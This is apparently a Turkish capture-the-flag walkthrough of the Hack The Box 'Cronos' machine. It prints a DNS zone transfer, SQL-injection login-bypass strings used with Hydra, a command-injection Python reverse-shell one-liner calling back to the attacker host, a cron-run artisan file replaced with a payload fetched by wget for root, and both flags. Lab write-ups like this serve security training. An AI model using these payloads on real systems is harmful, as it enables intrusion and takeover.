| Makine Adı | Seviye | OS | Logo |
|---|---|---|---|
| Cronos - HTB | Orta | Linux |
Walkthrough
nmap taraması ile başlayalım.
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 18:b9:73:82:6f:26:c7:78:8f:1b:39:88:d8:02:ce:e8 (RSA)
| 256 1a:e6:06:a6:05:0b:bb:41:92:b0:28:bf:7f:e5:96:3b (ECDSA)
|_ 256 1a:0e:e7:ba:00:cc:02:01:04:cd:a3:a9:3f:5e:22:20 (ED25519)
53/tcp open domain ISC BIND 9.10.3-P4 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.10.3-P4-Ubuntu
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
İlk oalrak 80'e gittim ve hiçbir şey bulamadım. Bunun üzerine 53. port'tan ilgi toplamayı denedim.
┌──(root💀kali)-[/home/…/Desktop/HTB/Linux/cronos]
└─# nslookup 1 ⨯
> server 10.10.10.13
Default server: 10.10.10.13
Address: 10.10.10.13#53
> 10.10.10.13
13.10.10.10.in-addr.arpa name = ns1.cronos.htb.
>
Daha sonrasında bütün host'lqrı bulmayı denedim.
┌──(root💀kali)-[/home/…/Desktop/HTB/Linux/cronos]
└─# host -l -a cronos.htb 10.10.10.13
Trying "cronos.htb"
Using domain server:
Name: 10.10.10.13
Address: 10.10.10.13#53
Aliases:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 26260
;; flags: qr aa ra; QUERY: 1, ANSWER: 7, AUTHORITY: 0, ADDITIONAL: 0
;; QUESTION SECTION:
;cronos.htb. IN AXFR
;; ANSWER SECTION:
cronos.htb. 604800 IN SOA cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
cronos.htb. 604800 IN NS ns1.cronos.htb.
cronos.htb. 604800 IN A 10.10.10.13
admin.cronos.htb. 604800 IN A 10.10.10.13
ns1.cronos.htb. 604800 IN A 10.10.10.13
www.cronos.htb. 604800 IN A 10.10.10.13
cronos.htb. 604800 IN SOA cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
Received 192 bytes from 10.10.10.13#53 in 83 ms
Bu hostları etc/hosts'uma ekledim ve devam ettim.
gobuster, dirb gibi taramalardan çok önemli bir şey çıkmadı ancak admin.cronos.htb sayfasında sqli olabileceğini düşündüm Bunun üzerine internetten sqli wordlisti buldum ve onu bir wordlist olarak hydra'ya verdim. Wordlist'in olduğu sayfa: https://book.hacktricks.xyz/pentesting-web/login-bypass/sql-login-bypass
┌──(root💀kali)-[/home/…/Desktop/HTB/Linux/cronos]
└─# hydra -L sql.txt -P sql.txt admin.cronos.htb http-post-form "/:username=^USER^&password=^PASS^:Your Login Name or Password is invalid"
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-08-28 04:53:30
[DATA] max 16 tasks per 1 server, overall 16 tasks, 649636 login tries (l:806/p:806), ~40603 tries per task
[DATA] attacking http-post-form://admin.cronos.htb:80/:username=^USER^&password=^PASS^:Your Login Name or Password is invalid
[STATUS] 1588.00 tries/min, 1588 tries in 00:01h, 648048 to do in 06:49h, 16 active
[STATUS] 1611.33 tries/min, 4834 tries in 00:03h, 644802 to do in 06:41h, 16 active
[80][http-post-form] host: admin.cronos.htb login: ' or 1 or ' password: admin
[80][http-post-form] host: admin.cronos.htb login: ' or 1 or ' password: 1234
[80][http-post-form] host: admin.cronos.htb login: ' or 1 or ' password: 123456
[80][http-post-form] host: admin.cronos.htb login: ' or 1 or ' password: toor
[80][http-post-form] host: admin.cronos.htb login: ' or 1 or ' password: password
[80][http-post-form] host: admin.cronos.htb login: ' or 1 or ' password: root
[80][http-post-form] host: admin.cronos.htb login: ' or 1 or ' password: test
[80][http-post-form] host: admin.cronos.htb login: ' or 1 or ' password: guest
[80][http-post-form] host: admin.cronos.htb login: ' or 1 or ' password: ' or ''='
[80][http-post-form] host: admin.cronos.htb login: ' or 1 or ' password: ' or '1'='1
[80][http-post-form] host: admin.cronos.htb login: ' or 1 or ' password: ' or 1]%00
[80][http-post-form] host: admin.cronos.htb login: ' or 1 or ' password: ' or true() or '
[80][http-post-form] host: admin.cronos.htb login: ' or 1 or ' password: ' or /* or '
[80][http-post-form] host: admin.cronos.htb login: ' or 1 or ' password: ' or "a" or '
[80][http-post-form] host: admin.cronos.htb login: ' or 1 or ' password: ' or 1 or '
[80][http-post-form] host: admin.cronos.htb login: ' or 1 or ' password: 'or string-length(name(.))<10 or'
[STATUS] 1729.00 tries/min, 12103 tries in 00:07h, 637533 to do in 06:09h, 16 active
[80][http-post-form] host: admin.cronos.htb login: admin' or ' password: admin
[80][http-post-form] host: admin.cronos.htb login: admin' or ' password: 123456
[80][http-post-form] host: admin.cronos.htb login: admin' or ' password: password
[80][http-post-form] host: admin.cronos.htb login: admin' or ' password: root
[80][http-post-form] host: admin.cronos.htb login: admin' or ' password: 1234
[80][http-post-form] host: admin.cronos.htb login: admin' or ' password: test
[80][http-post-form] host: admin.cronos.htb login: admin' or ' password: ' or '1'='1
[80][http-post-form] host: admin.cronos.htb login: admin' or ' password: toor
[80][http-post-form] host: admin.cronos.htb login: admin' or ' password: ' or ''='
[80][http-post-form] host: admin.cronos.htb login: admin' or ' password: ' or 1]%00
[80][http-post-form] host: admin.cronos.htb login: admin' or ' password: guest
[80][http-post-form] host: admin.cronos.htb login: admin' or ' password: ' or /* or '
[80][http-post-form] host: admin.cronos.htb login: admin' or ' password: ' or 1 or '
[80][http-post-form] host: admin.cronos.htb login: admin' or ' password: ' or true() or '
[80][http-post-form] host: admin.cronos.htb login: admin' or ' password: ' or "a" or '
[80][http-post-form] host: admin.cronos.htb login: admin' or ' password: 'or string-length(name(.))<10 or'
[80][http-post-form] host: admin.cronos.htb login: admin' or '1'='2 password: admin
[80][http-post-form] host: admin.cronos.htb login: admin' or '1'='2 password: password
[80][http-post-form] host: admin.cronos.htb login: admin' or '1'='2 password: 123456
[80][http-post-form] host: admin.cronos.htb login: admin' or '1'='2 password: root
[80][http-post-form] host: admin.cronos.htb login: admin' or '1'='2 password: 1234
[80][http-post-form] host: admin.cronos.htb login: admin' or '1'='2 password: toor
[80][http-post-form] host: admin.cronos.htb login: admin' or '1'='2 password: test
[80][http-post-form] host: admin.cronos.htb login: admin' or '1'='2 password: guest
[80][http-post-form] host: admin.cronos.htb login: admin' or '1'='2 password: ' or '1'='1
[80][http-post-form] host: admin.cronos.htb login: admin' or '1'='2 password: ' or /* or '
[80][http-post-form] host: admin.cronos.htb login: admin' or '1'='2 password: ' or ''='
[80][http-post-form] host: admin.cronos.htb login: admin' or '1'='2 password: ' or 1]%00
[80][http-post-form] host: admin.cronos.htb login: admin' or '1'='2 password: ' or "a" or '
[80][http-post-form] host: admin.cronos.htb login: admin' or '1'='2 password: ' or 1 or '
[80][http-post-form] host: admin.cronos.htb login: admin' or '1'='2 password: ' or true() or '
[80][http-post-form] host: admin.cronos.htb login: admin' or '1'='2 password: 'or string-length(name(.))<10 or'
^CThe session file ./hydra.restore was written. Type "hydra -R" to resume session.
Harika şimdi sisteme giriş yapalım. Sisteme girşi yaptıktan sonra komut çalıştırabildiğimiz bir sayfa () gördüm.
8.8.8.8; python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.4",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
payloadını gönderdim ve reverse aldım.
┌──(root💀kali)-[/home/…/Desktop/HTB/Linux/cronos]
└─# nc -lvp 1234
listening on [any] 1234 ...
connect to [10.10.14.4] from cronos.htb [10.10.10.13] 40338
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$
User flag'i direkt okuyabildim.
python -c 'import pty; pty.spawn("/bin/bash")'
www-data@cronos:/var/www/admin$
www-data@cronos:/var/www/admin$
www-data@cronos:/var/www/admin$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@cronos:/var/www/admin$
www-data@cronos:/var/www/admin$
www-data@cronos:/var/www/admin$ cd /home
cd /home
www-data@cronos:/home$ ls
ls
noulis
www-data@cronos:/home$ cd noulis
cd noulis
www-data@cronos:/home/noulis$ ls
ls
user.txt
www-data@cronos:/home/noulis$ cat user.txt
cat user.txt
51d236438b333970dbba7dc3089be33b
İçeride gezinirken artisan dosyasının root haklarda sürekli çalıştırıdlığını gördüm ve yazma hakkımda vardı. Bunun üzerine bir reverse ayarladım ve makineye upload ettim daha sonrasında bir dinleme kabuğu başlattım ve root oldum.
* * * * * root php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1
www-data@cronos:/var/www/laravel$ wget http://10.10.14.4/artisan
wget http://10.10.14.4/artisan
--2021-08-29 12:52:12-- http://10.10.14.4/artisan
Connecting to 10.10.14.4:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5492 (5.4K) [application/octet-stream]
Saving to: 'artisan.1'
artisan.1 100%[===================>] 5.36K --.-KB/s in 0s
2021-08-29 12:52:12 (471 MB/s) - 'artisan.1' saved [5492/5492]
www-data@cronos:/var/www/laravel$ rm artisan
rm artisan
www-data@cronos:/var/www/laravel$ mv artisan.1 artisan
mv artisan.1 artisan
┌──(root💀kali)-[/opt/PEASS-ng/linPEAS]
└─# nc -vlp 4444 130 ⨯
listening on [any] 4444 ...
connect to [10.10.14.4] from cronos.htb [10.10.10.13] 55342
Linux cronos 4.4.0-72-generic #93-Ubuntu SMP Fri Mar 31 14:07:41 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
12:53:01 up 51 min, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=0(root) gid=0(root) groups=0(root)
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
# cd /root
# ls
root.txt
# cat root.txt
1703b8a3c9a8dde879942c79d02fd3a0
İlk Yorumu Siz Yapın